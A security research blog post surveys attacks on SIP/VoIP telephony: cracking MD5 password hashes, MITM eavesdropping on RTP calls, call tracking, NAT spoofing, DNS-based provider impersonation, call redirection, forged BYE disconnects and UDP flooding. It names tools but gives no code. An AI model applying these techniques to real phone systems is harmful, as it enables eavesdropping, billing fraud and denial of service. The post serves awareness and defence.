February 24, 2014

A Sketch of SIP Security

The Internet is a great tool for communication. You can contact other people using e-mail, online chats, voice and video messengers. With the arrival of new cable systems and Balloon-Powered Internet, soon even the penguins of Antarctica will have access to the Internet!

But what about voice? Since there's such wide Internet coverage, why do we need telephone lines?  We could send voice over Internet channels and SIP (Session Initiation Protocol) addresses this need. SIP has a very interesting story but first we want to highlight certain aspects of the protocol.
SIP is the most commonly used protocol for Voice over Internet Protocol (VoIP) services. SIP is a protocol for initiating a session for further data transfer. It transfers information such as login, domain and password in clear text (in open or hash form). Sometimes the authentication process is not supported (connection is established as a combination IP:port).

Next we will examine several threats that can occur while using SIP and methods to exploit them.

Threats
Let's examine several threats that can occur while using SIP and methods used to exploit them. There are nasty things we can do to study SIP security. Note that to perform certain attacks an intruder must be in the traffic path from the client to the server (or perform an MITM attack).

Accounting data stealing
As the SIP protocol transfers data in clear text, anyone who is able to tap the traffic sent actually can obtain various bits of information. Let's take the authentication process, for instance. A SIP password is MD5 hashed, even though it is strongly recommended not to use  this algorithm in any capacity. Such a password can be brute-forced through SIPcrack, for example:


An intruder can use obtained account data in various schemes. He or she can get access to all services that a subscriber of Triple Play  uses. Speaking of higher risks, a SIP account can be used in PRS fraud for making calls to some expensive destinations (the subscriber is billed for somebody else's calls, which may be very expensive).

Details on brute-forcing a SIP password can be found here: http://www.sipsorcery.com/mainsite/Help/SIPPasswordSecurity

Tapping
SIP does not carry any voice stream itself. For payload transmission (audio stream, for instance) the Real-Time Transport Protocol (RTP) is used. RTP is quite friendly and does not encode transmitted data. And here the question arises—whether someone who is in the middle tapping our traffic is able to tap our conversation as well. Well, yes, actually it is possible. Cain is a popular tool that will kindly help perform an MITM attack. By using it, one can listen to tapped conversation. An intruder can easily use information obtained this way to blackmail a victim.


Call tracking
If an intruder is able to sniff packets transmitted from the user, he or she then can find out when and whom the victim called, because SIP does not encode transmitted data. This information can later be used in social engineering attacks.

Attacks behind NAT
If the user doesn't have an external IP, an intruder that has the same address can make calls at the expense of him/her. This may occur if the Internet provider gives access to the network through NAT, behind which there can be lots of other people as well. It is common for business centers where many small companies use NAT of a local provider.


As you can see at the picture, the packet received by the provider contains the sender’s IP address before the NAT translation. However, this field is not verified while establishing a connection (only the public address is verified), so the packet may contain an IP address other than that of the genuine subscriber.

Impersonating a provider
What about VoIP security on the provider side? By running an MITM attack against a DNS server or by DNS cash poisoning (the Kaminsky attack, for example), an intruder is able to impersonate a provider and transfer all calls through his or her own system.

Calls redirected
After implementing an MITM attack, an attacker can redirect clients’ calls to another number, including non-existent numbers, which results in DoS.


By capturing INVITE packets, an intruder responds with a packet with a 301 Moved Permanently code and thus redirects the call.

Disconnection
If an intruder has the values of Caller ID and From/To tags (or can try possible combinations of the fields), he or she is able to disconnect active sessions by sending prebuilt malicious packets with a SIP BYE-request (using Scapy,, for instance).


Fake calls
SIP usually uses the UDP protocol, which allows spoofing. An intruder may generate lots of requests for calling a subscriber, which leads to denial of service of a telephone exchange and paralyzes a telephony system.


Conclusion on SIP security
Though protection methods against most of the attacks mentioned here were developed long ago, both clients and VoIP providers completely ignore safety precautions and SIP security options. So you need to watch your back because your SIP provider isn’t watching it for you.

Author: Ilya Safronov, Positive Research 

4 comments:

  1. Your RSS is broken. It has been for awhile.

    ReplyDelete
  2. Hi! Thanks for paying an attention. Now should be fine

    ReplyDelete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete